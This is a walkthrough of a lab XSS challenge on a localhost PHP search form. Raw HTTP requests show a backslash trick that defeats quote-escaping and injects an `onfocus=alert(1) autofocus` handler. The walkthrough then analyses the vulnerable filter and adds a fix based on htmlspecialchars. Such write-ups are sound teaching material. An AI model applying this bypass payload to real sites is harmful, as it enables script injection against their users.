# xxs6

## Exploitation

To protect the application, the author states that the `"` character is now escaped:

![](/files/z0ydvPgLyJrqQG8kmrTx)

The `"` character is indeed processed: it is escaped by inserting a `\` character in front of it:

```http
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%22&submit=Envoyer
```

```html
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2100
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
  <input type="text" class="form-control" id="search" name="search" value="whatever\"" placeholder="keyword" required>
</div>
```

![](/files/TIzb8kujzfPprI11k9mS)

The bypass that seems most obvious to me to test is to insert a `\` character of my own, in order to escape the escaping:

```http
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%5C%22&submit=Envoyer
```

```html
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2101
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
  <input type="text" class="form-control" id="search" name="search" value="whatever\\"" placeholder="keyword" required>
</div>
```

This seems to work:

![](/files/2ftHeeCPEDSoEYIO0MBx)

All that is left is to adapt my autofocus-based payload to `whatever\" onfocus=alert(1) autofocus x=\"` (note that I also drop the quotes around the JavaScript code):

```http
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%5C%22+onfocus%3Dalert%281%29+autofocus+x%3D%5C%22&submit=Envoyer
```

```html
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2134
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
  <input type="text" class="form-control" id="search" name="search" value="whatever\\" onfocus=alert(1) autofocus x=\\"" placeholder="keyword" required>
</div>
```

![](/files/FkNTs4FAdKaZtRHSH20G)

## Source code analysis

The `xss_check()` function processes the `"` character by prepending a `\` to each occurrence. The keyword is then output as the value of the HTML `value` attribute:

```php
<?php
  if (isset ($_POST['submit']) && isset ($_POST['search'])) {
    $keyword = $_POST['search'];
  }

  function xss_check($data) {
    $input = str_replace('"', '\"', $data);
    $input = urldecode($input);
    return $input;
  }
?>

<div class="row">
  <form name="forgetPass" method="post">
    <div class="form-group col-md-2">
      <input type="text" class="form-control" id="search" name="search" value="<?php if (isset ($keyword) && !empty ($keyword)){ echo xss_check($keyword); }?>" placeholder="keyword" required>
    </div>
    <div class="form-group col-md-2">
      <input type="submit" class="form-control btn btn-default" name="submit">
    </div>
  </form>
</div>
```
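As an added example (not the challenge's own code), the vulnerable `xss_check()` next to a hardened version that encodes the value for the HTML attribute context with `htmlspecialchars()` and `ENT_QUOTES`, rendered against the three search values used above. The `render_input()` helper and the sample inputs are my own.

```php
<?php
// Vulnerable filter from the challenge. A backslash has no meaning inside an
// HTML attribute, so `\"` still terminates the attribute; the extra `\` the
// attacker sends simply ends up as literal text before the closing quote.
// Decoding after escaping is also backwards: output encoding must be the
// last transformation applied to the data.
function xss_check_vulnerable(string $data): string {
    $input = str_replace('"', '\"', $data);
    $input = urldecode($input);
    return $input;
}

// Hardened version: encode for the attribute context. ENT_QUOTES turns both
// `"` and `'` into entities, ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string, and nothing is decoded afterwards.
function xss_check_fixed(string $data): string {
    return htmlspecialchars($data, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Assumed helper: build the <input> tag the same way the challenge page does.
function render_input(callable $filter, string $keyword): string {
    return '<input type="text" name="search" value="' . $filter($keyword) . '">';
}

// Constructed inputs: the three search values from the walkthrough, as PHP
// receives them once the form body has been URL-decoded.
$inputs = [
    'whatever"',
    'whatever\\"',
    'whatever\\" onfocus=alert(1) autofocus x=\\"',
];

foreach ($inputs as $keyword) {
    echo "input:      $keyword\n";
    echo "vulnerable: " . render_input('xss_check_vulnerable', $keyword) . "\n";
    echo "fixed:      " . render_input('xss_check_fixed', $keyword) . "\n\n";
}
```

With the hardened filter every `"` becomes `&quot;`, so the third input is rendered as inert text inside the attribute instead of a new `onfocus` handler.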
